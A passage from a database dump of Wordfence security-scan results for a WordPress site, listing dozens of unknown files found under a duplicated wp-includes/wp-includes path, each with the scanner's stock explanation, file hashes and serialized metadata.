More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33956,1631564687,1631564687,'new','knownfile',75,'571b27f4af027769e9bb771241355595','37cc82269c8c65ce4fe4fdc07d16c54f','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33957,1631564687,1631564687,'new','knownfile',75,'b40eef292aa94aea593a4b96d8f9199b','e318a5309cce42fa0218f439aca95ec4','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menus-panel.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menus-panel.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33958,1631564687,1631564687,'new','knownfile',75,'8214b3fd260f0956f70f6ad2f834bc9a','e3ff681fc1dd8a74eb633589d60b0ad4','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-new-menu-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-new-menu-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33959,1631564687,1631564687,'new','knownfile',75,'c4f0d1d332f53267db22cd98b01b1c6e','21e953c70d9bdb8766ccacda812d300a','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-new-menu-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-new-menu-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33960,1631564687,1631564687,'new','knownfile',75,'38fe581e1d3e77f1f63be7ea6a3df951','2ccfe6e0e5ea3181de1c6f927679e980','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-partial.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/customize/class-wp-customize-partial.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33961,1631564687,1631564687,'new','knownfile',75,'e6463b608cfea23d00f5155fd357645f','c89ce73f11f584f14de63e33aba25b6c','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-selective-refresh.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/customize/class-wp-customize-selective-refresh.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33962,1631564687,1631564687,'new','knownfile',75,'8224e2952ce77de2e96b49e2af9ec746','8f7f0858acada66bd0023daa14ee2152','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-sidebar-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/customize/class-wp-customize-sidebar-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33963,1631564687,1631564687,'new','knownfile',75,'a10a6aa05e33f8495e4ae9d311d1020c','024dda876c5dbd9c1e988b0bbc41a74b','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-site-icon-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/customize/class-wp-customize-site-icon-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33964,1631564687,1631564687,'new','knownfile',75,'5f908d461bf00e1e121a26c2f9f99bb8','95cb6a8a2f149ed9c2df42c4546becf5','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-theme-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/customize/class-wp-customize-theme-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33965,1631564687,1631564687,'new','knownfile',75,'6e69abaaf829533160ea3956980b2c11','f9030ea3b7a6285f0c8505c63580253f','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-themes-panel.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/customize/class-wp-customize-themes-panel.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33966,1631564687,1631564687,'new','knownfile',75,'195a5e425d9ecfe9e5c2d23f280c1574','89a9adbca0f00458122e523315ac50fb','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-themes-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/customize/class-wp-customize-themes-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33967,1631564687,1631564687,'new','knownfile',75,'f2f3f4316ce08a39a736afa21a05c9ad','520b2b3f68eba47ec1401c8728b59244','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-upload-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/customize/class-wp-customize-upload-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33968,1631564687,1631564687,'new','knownfile',75,'8aebe102ca83c9ba9f23a10210370468','860487125e56667f703f442b9c1c797d','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-widget-area-customize-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/customize/class-wp-widget-area-customize-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33969,1631564687,1631564687,'new','knownfile',75,'a5ea1a9e860646412f3303885309ee64','d0936f6da81414cad0e86831b3b8da75','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-widget-form-customize-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/customize/class-wp-widget-form-customize-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33970,1631564687,1631564687,'new','knownfile',75,'e172f3b1d20ab40c5d01065d274253d2','eebc29b061a88ac2195ceaa5629a3ed7','Unknown file in WordPress core: wp-includes/wp-includes/date.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/date.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33971,1631564687,1631564687,'new','knownfile',75,'002344d295c2a9c9bb9d6da4dc045f0c','b074eb615faafe06f93a0068a775eedd','Unknown file in WordPress core: wp-includes/wp-includes/default-constants.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/default-constants.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33972,1631564687,1631564687,'new','knownfile',75,'dc4a7dc2bfc56c7b6ada4afb121eccb7','9f5f712590d7a9e046aaea38adf59706','Unknown file in WordPress core: wp-includes/wp-includes/default-filters.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/default-filters.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33973,1631564687,1631564687,'new','knownfile',75,'1cbf7cc6a6c53344a3990f1511db9a11','e277bb45841e468950a1b17de0ea3504','Unknown file in WordPress core: wp-includes/wp-includes/default-widgets.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/default-widgets.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33974,1631564687,1631564687,'new','knownfile',75,'e88f280ed49d3567ad6f371775d80578','f4ad88cfe704f11083f5c7012a5cc427','Unknown file in WordPress core: wp-includes/wp-includes/deprecated.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/deprecated.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33975,1631564687,1631564687,'new','knownfile',75,'66f81e0b5804dc8470b2d03a37a60bd2','a764c0b72b04f6cb539473ac005b8af6','Unknown file in WordPress core: wp-includes/wp-includes/embed-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/embed-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33976,1631564687,1631564687,'new','knownfile',75,'7ad3257b61c9d0b86a54e115e31a60da','8e7744b4973b358ae852e86f1f8b423f','Unknown file in WordPress core: wp-includes/wp-includes/embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33977,1631564687,1631564687,'new','knownfile',75,'7659437bf31fbf08a6384cfdf25996a9','2cf0884644e0f6b12933b13d54dbb814','Unknown file in WordPress core: wp-includes/wp-includes/error-protection.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/error-protection.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33978,1631564687,1631564687,'new','knownfile',75,'d40ef568ec0deca9a1cc48cc729b168a','edc1637d9d69beafa177a9e26fa5053d','Unknown file in WordPress core: wp-includes/wp-includes/feed-atom-comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/feed-atom-comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33979,1631564687,1631564687,'new','knownfile',75,'eb7fab1d0b18164c1a1713d7fc308563','b9e7ac8d9aaa378cfd8fc175c22d26d4','Unknown file in WordPress core: wp-includes/wp-includes/feed-atom.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/feed-atom.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33980,1631564687,1631564687,'new','knownfile',75,'9502a14396b85c73e4b0ed6ce2b30a01','740f3964eb947cdc39a6e99da8c714a3','Unknown file in WordPress core: wp-includes/wp-includes/feed-rdf.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/feed-rdf.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33981,1631564687,1631564687,'new','knownfile',75,'f21442d4627eb4891554a76aa3c2bbd4','a6c797766a942208f46426858284654f','Unknown file in WordPress core: wp-includes/wp-includes/feed-rss.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/feed-rss.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33982,1631564687,1631564687,'new','knownfile',75,'57e4840c5adbdb24d017846da8b638dd','6b7dc1ac1ab27b8d6d5a1e1758871f7c','Unknown file in WordPress core: wp-includes/wp-includes/feed-rss2-comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/feed-rss2-comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33983,1631564687,1631564687,'new','knownfile',75,'6d5b239b18454692d0dd79bb8f9d2b2b','eb909104f8406d9f9e739b136d48fc33','Unknown file in WordPress core: wp-includes/wp-includes/feed-rss2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/feed-rss2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33984,1631564688,1631564688,'new','knownfile',75,'d41a32afd41f30bae8c45850077c71a2','1f99168e0ee8dda36ca212ff8f14a07e','Unknown file in WordPress core: wp-includes/wp-includes/feed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/feed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33985,1631564688,1631564688,'new','knownfile',75,'2d3c516584f398351b7514ae512eaa96','6180ad51bded40e3aea3e2960a4bfc8a','Unknown file in WordPress core: wp-includes/wp-includes/formatting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/formatting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33986,1631564688,1631564688,'new','knownfile',75,'6def27f74462697e6049acfaae2cba4f','1bcd54d462de136cf63f4c13886de6cf','Unknown file in WordPress core: wp-includes/wp-includes/functions.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/functions.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33987,1631564688,1631564688,'new','knownfile',75,'0a75ef0544398e81342ed5d3693af326','c9f8dedde0a03b76dbc3ddb2b1cfaa1c','Unknown file in WordPress core: wp-includes/wp-includes/functions.wp-scripts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/functions.wp-scripts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33988,1631564688,1631564688,'new','knownfile',75,'9a6987ee556e81a0644f7ab03d8d8cb8','a3407b95e4c4af2ad10e2d1261b2f6b2','Unknown file in WordPress core: wp-includes/wp-includes/functions.wp-styles.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/functions.wp-styles.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33989,1631564688,1631564688,'new','knownfile',75,'5819ad1c54698b9b011de081caac8eeb','970a44fc9efaf8f5bdd82d5fb5e74163','Unknown file in WordPress core: wp-includes/wp-includes/general-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/general-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33990,1631564688,1631564688,'new','knownfile',75,'c823ae0c558d8a95e98c211186681a6c','97cdf2d00ca759af715887880bf9f5eb','Unknown file in WordPress core: wp-includes/wp-includes/http.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/http.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33991,1631564688,1631564688,'new','knownfile',75,'93e7b26c7e607fa04a851c9be22b6093','e0c52bd1ef0f05ae7b4a686cd8044d5f','Unknown file in WordPress core: wp-includes/wp-includes/https-detection.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/https-detection.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33992,1631564688,1631564688,'new','knownfile',75,'c3ec9aae79a10c0db19fd91e0bce4942','74650ebeaac066f1a5470fae054270af','Unknown file in WordPress core: wp-includes/wp-includes/https-migration.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/https-migration.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33993,1631564688,1631564688,'new','knownfile',75,'0a89880fd477df6b6ce55871e02b3cf4','dccc5b322560a34360dc988a4d792749','Unknown file in WordPress core: wp-includes/wp-includes/images/admin-bar-sprite-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/images/admin-bar-sprite-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33994,1631564688,1631564688,'new','knownfile',75,'05b1081077706eb88e24770f7b17871a','ca599aa57d7d9f184011f080b6245bca','Unknown file in WordPress core: wp-includes/wp-includes/images/admin-bar-sprite.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/admin-bar-sprite.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33995,1631564688,1631564688,'new','knownfile',75,'50d106cafb9f883e571244b458cadb65','7d4a57eafd2a7af9c64db4575dcde0fe','Unknown file in WordPress core: wp-includes/wp-includes/images/arrow-pointer-blue-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 